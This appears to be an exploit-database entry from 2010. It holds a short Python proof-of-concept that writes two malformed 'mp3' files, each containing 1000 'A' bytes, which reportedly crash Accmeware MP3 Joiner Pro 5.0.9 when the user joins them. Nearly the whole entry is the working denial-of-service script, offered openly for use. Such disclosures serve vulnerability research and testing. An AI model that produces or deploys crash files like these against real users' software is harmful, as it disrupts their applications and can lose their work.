Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)



EKU-ID: 21957 CVE: OSVDB-ID:
Author: 0v3r Published: 2010-12-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Accmeware MP3 Joiner Pro 5.0.9 DoS PoC
# Date: 12/20/2010
# Author: 0v3r
# Software Link: http://www.mp3-joiner.net/Files/MJPSetup.exe
# Version: 5.0.9
# Tested on: Windows XP SP3 EN (VirtualBxox)
# CVE: N/A

# The application crashes when trys to join two malformed mp3 files

#!/usr/bin/python

buff 	 = "\x41" * 1000

try:
 	f = open("1.mp3",'w')
	f.write(buff)
	f.close()
	f = open("2.mp3",'w')
        f.write(buff)
        f.close()

	print "Vulnerable files created!..."
	print "Insert mp3 files into the application and select join\n"
except:
	print "Error occured!"